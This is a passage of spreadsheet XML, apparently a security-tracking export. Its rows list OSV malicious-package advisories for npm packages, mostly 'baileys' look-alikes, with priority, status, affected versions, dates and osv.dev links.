          <t>npm:@lendkzn/xntaabail</t>
        </is>
      </c>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr"/>
      <c r="S6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@lendkzn/xntaabail (npm), version(s): 7.0.0.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17364</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17365</t>
        </is>
      </c>
      <c r="D69" s="5" t="inlineStr"/>
      <c r="E69" s="5" t="inlineStr"/>
      <c r="F69" s="5" t="inlineStr"/>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>npm:@lendxntaa/baileys</t>
        </is>
      </c>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr"/>
      <c r="S6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@lendxntaa/baileys (npm), version(s): 9.5.0, 9.3.0, 9.1.0, 9.0.2, 9.0.1.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17365</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17366</t>
        </is>
      </c>
      <c r="D70" s="5" t="inlineStr"/>
      <c r="E70" s="5" t="inlineStr"/>
      <c r="F70" s="5" t="inlineStr"/>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>npm:@levvicode/baileys</t>
        </is>
      </c>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr"/>
      <c r="S7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@levvicode/baileys (npm), version(s): 0.0.3, 0.0.2.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17366</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17367</t>
        </is>
      </c>
      <c r="D71" s="5" t="inlineStr"/>
      <c r="E71" s="5" t="inlineStr"/>
      <c r="F71" s="5" t="inlineStr"/>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>npm:@mikudeveloper/grace</t>
        </is>
      </c>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr"/>
      <c r="S7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@mikudeveloper/grace (npm), version(s): 2.0.1, 1.0.21, 1.0.20.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17367</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17368</t>
        </is>
      </c>
      <c r="D72" s="5" t="inlineStr"/>
      <c r="E72" s="5" t="inlineStr"/>
      <c r="F72" s="5" t="inlineStr"/>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>npm:@mivesensei/baileys</t>
        </is>
      </c>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr"/>
      <c r="S7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@mivesensei/baileys (npm), version(s): 0.4.2.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17368</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17369</t>
        </is>
      </c>
      <c r="D73" s="5" t="inlineStr"/>
      <c r="E73" s="5" t="inlineStr"/>
      <c r="F73" s="5" t="inlineStr"/>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>npm:@noxleyss/baileys</t>
        </is>
      </c>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr"/>
      <c r="S7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@noxleyss/baileys (npm), version(s): 1.1.10.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17369</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17370</t>
        </is>
      </c>
      <c r="D74" s="5" t="inlineStr"/>
      <c r="E74" s="5" t="inlineStr"/>
      <c r="F74" s="5" t="inlineStr"/>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr">
        <is>
          <t>npm:@nyzzpedia/baileys-new</t>
        </is>
      </c>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr"/>
      <c r="S7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@nyzzpedia/baileys-new (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17370</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17371</t>
        </is>
      </c>
      <c r="D75" s="5" t="inlineStr"/>
      <c r="E75" s="5" t="inlineStr"/>
      <c r="F75" s="5" t="inlineStr"/>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr">
        <is>
          <t>npm:@nyzzpediaa/baileys-new</t>
        </is>
      </c>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr"/>
      <c r="S7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@nyzzpediaa/baileys-new (npm), version(s): 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.0.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17371</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17372</t>
        </is>
      </c>
      <c r="D76" s="5" t="inlineStr"/>
      <c r="E76" s="5" t="inlineStr"/>
      <c r="F76" s="5" t="inlineStr"/>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr">
        <is>
          <t>npm:@ostyado/baileys</t>
        </is>
      </c>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr"/>
      <c r="S7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@ostyado/baileys (npm), version(s): 2.0.9, 2.0.8, 2.0.7, 2.0.6.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17372</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17373</t>
        </is>
      </c>
      <c r="D77" s="5" t="inlineStr"/>
      <c r="E77" s="5" t="inlineStr"/>
      <c r="F77" s="5" t="inlineStr"/>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>npm:@queenanya/baileys</t>
        </is>
      </c>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr"/>
      <c r="S7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@queenanya/baileys (npm), version(s): 9.10.1, 9.7.3-beta.1, 9.7.2.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17373</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17374</t>
        </is>
      </c>
      <c r="D78" s="5" t="inlineStr"/>
      <c r="E78" s="5" t="inlineStr"/>
      <c r="F78" s="5" t="inlineStr"/>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>npm:@rennnpm/baileys</t>
        </is>
      </c>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr"/>
      <c r="S7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@rennnpm/baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17374</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17375</t>
        </is>
      </c>
      <c r="D79" s="5" t="inlineStr"/>
      <c r="E79" s="5" t="inlineStr"/>
      <c r="F79" s="5" t="inlineStr"/>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr">
        <is>
          <t>npm:@revizahoshii/baileys</t>
        </is>
      </c>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr"/>
      <c r="S7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@revizahoshii/baileys (npm), version(s): 0.5.4, 0.5.3, 0.5.2, 0.5.1, 0.5.0, 0.4.2, 0.4.1, 0.4.0, 0.3.18.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17375</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17376</t>
        </is>
      </c>
      <c r="D80" s="5" t="inlineStr"/>
      <c r="E80" s="5" t="inlineStr"/>
      <c r="F80" s="5" t="inlineStr"/>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr">
        <is>
          <t>npm:@revizahoshii/hoshino</t>
        </is>
      </c>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr"/>
      <c r="S8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@revizahoshii/hoshino (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17376</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17377</t>
        </is>
      </c>
      <c r="D81" s="5" t="inlineStr"/>
      <c r="E81" s="5" t="inlineStr"/>
      <c r="F81" s="5" t="inlineStr"/>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr">
        <is>
          <t>npm:@saazkira/baileys</t>
        </is>
      </c>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr"/>
      <c r="S8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@saazkira/baileys (npm), version(s): 2.1.9, 2.1.8, 2.1.7, 2.1.6.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17377</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17378</t>
        </is>
      </c>
      <c r="D82" s="5" t="inlineStr"/>
      <c r="E82" s="5" t="inlineStr"/>
      <c r="F82" s="5" t="inlineStr"/>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr">
        <is>
          <t>npm:@sairidev/baileys-new</t>
        </is>
      </c>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr"/>
      <c r="S8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@sairidev/baileys-new (npm), version(s): 0.3.21.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17378</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17379</t>
        </is>
      </c>
      <c r="D83" s="5" t="inlineStr"/>
      <c r="E83" s="5" t="inlineStr"/>
      <c r="F83" s="5" t="inlineStr"/>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr">
        <is>
          <t>npm:@sakataoffc/baileys</t>
        </is>
      </c>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr"/>
      <c r="S8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@sakataoffc/baileys (npm), version(s): 8.0.0, 7.0.0, 6.0.0, 5.0.1, 5.0.0, 4.0.0, 3.0.0, 2.0.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17379</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17380</t>
        </is>
      </c>
      <c r="D84" s="5" t="inlineStr"/>
      <c r="E84" s="5" t="inlineStr"/>
      <c r="F84" s="5" t="inlineStr"/>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr">
        <is>
          <t>npm:@teamolduser/baileys</t>
        </is>
      </c>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr"/>
      <c r="S8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@teamolduser/baileys (npm), version(s): 9.10.1, 9.7.3-beta.1, 9.7.2.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17380</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17381</t>
        </is>
      </c>
      <c r="D85" s="5" t="inlineStr"/>
      <c r="E85" s="5" t="inlineStr"/>
      <c r="F85" s="5" t="inlineStr"/>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr">
        <is>
          <t>npm:@wanzlonely/bails4u</t>
        </is>
      </c>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr"/>
      <c r="S8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@wanzlonely/bails4u (npm), version(s): 5.0.0, 4.0.0, 3.0.0, 2.0.0.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17381</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17382</t>
        </is>
      </c>
      <c r="D86" s="5" t="inlineStr"/>
      <c r="E86" s="5" t="inlineStr"/>
      <c r="F86" s="5" t="inlineStr"/>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>npm:@wenzyx1/bails</t>
        </is>
      </c>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr"/>
      <c r="S8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@wenzyx1/bails (npm), version(s): 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17382</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17383</t>
        </is>
      </c>
      <c r="D87" s="5" t="inlineStr"/>
      <c r="E87" s="5" t="inlineStr"/>
      <c r="F87" s="5" t="inlineStr"/>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr">
        <is>
          <t>npm:@xatancchii/velycxbail</t>
        </is>
      </c>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
